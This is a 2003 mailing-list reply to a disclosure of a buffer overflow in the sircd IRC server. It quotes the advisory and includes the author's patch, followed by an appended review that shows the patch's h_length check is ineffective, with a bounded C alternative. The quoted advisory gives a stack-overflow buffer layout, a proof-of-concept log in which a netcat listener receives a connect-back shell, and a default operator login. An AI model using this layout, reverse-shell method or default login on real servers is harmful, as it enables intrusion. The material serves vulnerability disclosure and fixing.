Date:      Tue, 04 Feb 2003 10:35:08 +0000
From:      Zarjazz <zarjazz@barrysworld.com>
To:        Knud Erik Højgaard <kain@ircop.dk>
Cc:        ports@freebsd.org
Subject:   Re: sircd buffer overflow
Message-ID:  <3E3F975C.9070109@barrysworld.com>
In-Reply-To: <002901c2cbd0$1ded9220$24029dd9@tuborg>
References:  <002901c2cbd0$1ded9220$24029dd9@tuborg>


Thanks for the info, but I'd like to say that the BSD ports version of
sircd is / was nothing to do with me, and v0.4.0 was the initial alpha
release and is now more than 1 year old compared to the current CVS tree,
so someone has not been keeping the source up to date!

> II. DESCRIPTION
>
> a: Insufficient bounds checking leads to execution of arbitrary code.

Patch attached to sanity check the dns lookup however I see this more as
a bug than an exploit as you need root access on the system before you
actually edit /etc/hosts in the first place.

I would be interested to know if the current CVS version is affected in
the same way, as a lot has changed since the 0.4.x tree.

> b: Default oper account matching *!*@*

In all my releases I only ever included an example.conf file under docs/
so I can't take the blame for anyone running a server with an unaltered
config file :)

Zarjazz

Knud Erik Højgaard wrote:
> A heads up.. 
> 
> 
> ------------------------------------------------------------------------
> 
> I. BACKGROUND
> 
> According to the vendor "The 'sircd' project started as an idea from
> the QuakeNet IRC Network coding team to develop a completely new irc
> server that had none of the problems of the original ircd, such as
> instability, scalability issues, redundant, badly written code and
> other nasty things. "
> More info is available at http://www.sircd.org.
> 
> II. DESCRIPTION
> 
> a: Insufficient bounds checking leads to execution of arbitrary code. 
> b: Default oper account matching *!*@*
> 
> III. ANALYSIS
> 
> a:
> Upon checking the reverse dns of a connecting user, if the returned
> value is longer than a certain length a classic stack overflow occurs.
> 
> The buffer may be constructed as such:
> [94 bytes of crap][EBP ][EIP ][400 bytes for nops and shellcode],
> leaving us with plenty of space both before and after eip to store our
> shellcode. 
> 
> The accompanying .sh script is a silly proof of concept. 
> Below is a fabricated copy of a typical run:
> 
> [shell 1]
> $ nc -l -v -p 10000
> listening on [any] 10000 ...
> 
> [shell 2]
> # ./sircd.sh 127.0.0.1
> 
> sircd 0.4.0 proof-of-concept, usage ./sircd.sh <ip-of-attacker>
> 
> UID check passed, backing up /etc/hosts
> Now connect to the sircd from 127.0.0.1
> Press a key and enter to restore /etc/hosts
> asd
> Game over man, game over
> #
> 
> [shell 3]
> $ sircd &
> [1] 75711
> $
> 
> =====================================
>  sircd:  v0.4.0 Alpha
>  Author(s)
>    Zarjazz (zarjazz@barrysworld.com)
> =====================================
> sircd initialized
> SSL initialized
> 
> $ BitchX 127.0.0.1
> [snip some bitchx output]
> [fi]  *** Welcome to the_server
> [fi]  *** Resolving IP 127.0.0.1
> --from here on the connection freezes.
> 
> [shell 2]
> fah
> Game over man, game over
> #
> 
> [shell 1]
> connect to [127.0.0.1] from [garbage snipped] [127.0.0.1] 1869
> id
> uid=1001(sircd-user) gid=1001(sircd-user) groups=1001(sircd-user)
> 
> b: type /oper bod bod bod in a connected irc-client.
> 
> IV. DETECTION
> 
> sircd-0.4.0 shipping with FreeBSD ports as well as from www.sircd.org 
> as per 03/02-03 is found to be vulnerable.
> 
> V. WORKAROUND
> 
> unknown
> 
> VI. VENDOR FIX
> 
> unknown
> 
> VII. CVE INFORMATION
> 
> unknown
> 
> VIII. DISCLOSURE TIMELINE
> 
> 03/02-02 zarjazz@barrysworld.com,ports@freebsd.org notified.
> 
> IX. CREDIT
> 
> Knud Erik Højgaard


Attachment: sircd.patch (text/plain, inline)

diff -rubBN sircd-0.4.0/sircd/src/ircd_callbacks.c sircd-0.4.0.fix/sircd/src/ircd_callbacks.c
--- sircd-0.4.0/sircd/src/ircd_callbacks.c	Sat Feb  2 17:44:49 2002
+++ sircd-0.4.0.fix/sircd/src/ircd_callbacks.c	Tue Feb  4 10:12:37 2003
@@ -314,7 +314,7 @@
 	{
 		/* not cached, so do a dns lookup of the ip address */
 		struct hostent *host_ent = gethostbyaddr((char * ) &addr.sin_addr, sizeof(addr.sin_addr), AF_INET);
-		if (host_ent)
+		if (host_ent && host_ent->h_length < HOSTLEN) 
 			ip_tree->left = (void *) str_dup(host_ent->h_name);
 		else
 			ip_tree->left = (void *) str_dup(cl_ip);
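Review bot: the new condition on the `+` line tests the wrong field. In `struct hostent`, `h_length` is the size in bytes of each address in `h_addr_list` (4 for AF_INET), not the length of `h_name`, so `host_ent->h_length < HOSTLEN` is true for every IPv4 lookup and the resolved name still reaches `str_dup` unbounded. The check has to look at the name itself, e.g. `if (host_ent && host_ent->h_name && strlen(host_ent->h_name) < HOSTLEN)`, and wherever the stored name is later copied into a fixed-size buffer that copy should be bounded as well, since `str_dup` allocates whatever length it is handed. The `+` line also carries trailing whitespace.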

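Added example, not code from the thread or from the sircd sources: a small C program that contrasts the patch's `h_length` test with a check on the name's actual length, and shows a bounded routine that stores the resolved name only when it fits and otherwise falls back to the IP text (the behaviour the patch's `else` branch intends). `HOSTLEN` is assumed to be 63 here, and the `struct hostent` is constructed inline to stand in for a resolver result; both are assumptions, not values from the page.

```c
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>

/* Assumed value for the server's hostname limit; the real sircd HOSTLEN is not on the page. */
#define HOSTLEN 63

/* The test the patch applies: h_length is the address size (4 for AF_INET),
 * so this says nothing about how long h_name is. */
int name_fits_by_h_length(const struct hostent *he)
{
    return he != NULL && he->h_length < HOSTLEN;
}

/* The test that actually bounds the string about to be copied. */
int name_fits_by_strlen(const struct hostent *he)
{
    return he != NULL && he->h_name != NULL && strlen(he->h_name) < HOSTLEN;
}

/* Decide what to store for a client: the resolved name if it fits, else the
 * dotted-quad text. Always writes a NUL-terminated string of at most
 * out_size - 1 bytes. Returns 1 when the resolved name was used, 0 on fallback. */
int choose_client_host(const struct hostent *he, const char *ip_text,
                       char *out, size_t out_size)
{
    const char *src = ip_text;
    int used_name = 0;

    if (name_fits_by_strlen(he) && strlen(he->h_name) < out_size) {
        src = he->h_name;
        used_name = 1;
    }
    /* Bounded copy on both paths; ip_text is caller-supplied too. */
    snprintf(out, out_size, "%s", src);
    return used_name;
}

/* Constructed sample: the shape of a hostent a resolver returns for an IPv4
 * address, with the caller choosing the name (possibly over-long). */
struct hostent make_sample(char *name)
{
    static unsigned char addr[4] = {127, 0, 0, 1};
    static char *addr_list[2];
    struct hostent he;

    addr_list[0] = (char *)addr;
    addr_list[1] = NULL;
    memset(&he, 0, sizeof he);
    he.h_name = name;
    he.h_addrtype = AF_INET;
    he.h_length = 4;          /* bytes per address, NOT strlen(h_name) */
    he.h_addr_list = addr_list;
    return he;
}

int main(void)
{
    char longname[200];
    char buf[HOSTLEN + 1];
    struct hostent he;
    int used;

    memset(longname, 'a', sizeof longname - 1);
    longname[sizeof longname - 1] = '\0';
    he = make_sample(longname);

    printf("h_length check accepts 199-char name: %d (wrong)\n",
           name_fits_by_h_length(&he));
    printf("strlen check accepts 199-char name:   %d\n",
           name_fits_by_strlen(&he));
    used = choose_client_host(&he, "127.0.0.1", buf, sizeof buf);
    printf("stored \"%s\" (resolved name used: %d)\n", buf, used);
    return 0;
}
```

The point to take from running it is that the `h_length` comparison accepts the over-long name, while the `strlen` comparison rejects it and the client ends up recorded by IP, which is the outcome the patch's `else` branch was written for.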

